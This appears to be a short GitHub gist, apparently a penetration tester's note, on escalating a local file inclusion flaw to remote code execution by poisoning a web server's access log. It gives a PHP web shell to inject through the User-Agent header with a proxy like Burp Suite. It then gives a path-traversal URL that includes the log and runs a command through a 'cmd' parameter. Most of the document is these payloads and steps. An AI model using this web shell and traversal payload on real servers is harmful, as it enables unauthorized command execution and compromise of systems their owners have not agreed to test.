AvasDream/lfi_to_rce.md

Last active June 15, 2018 06:34

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/AvasDream/2f6bb7a50b211f1752efd6293437cda7.js"></script>
Save AvasDream/2f6bb7a50b211f1752efd6293437cda7 to your computer and use it in GitHub Desktop.

Download ZIP

TYL Local File inclusion to remote code execution

Raw

lfi_to_rce.md

Prerequisites

LFI Vulnerability
Access to the Error or Access Log of the Server.

Example Log Entry

127.0.0.1 "GET /apache_pb.gif HTTP/1.0" "http://www.example.com/start.html" "Mozilla/4.08 [en] (Win98; I ;Nav)"

In this entry we see Header Information "Mozilla/4.08 [en] (Win98; I ;Nav)" from a GET Request and this is the place where we add our code.

Actions

Activate a Proxy like Burp Suite where you can edit the Request.
Add a Webshell to your header <?php echo shell_exec($_GET['cmd']);exit;?>

So our example Log entry would look like this:

127.0.0.1 "GET /apache_pb.gif HTTP/1.0" "http://www.example.com/start.html" "<?php echo shell_exec($_GET['cmd']);exit;?>"

Browse to your Access Log and add the command as URL Parameter:

http://x.x.x.x/lfivuln.php?file=../../../../../var/log/httpd-access.log&cmd=id

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment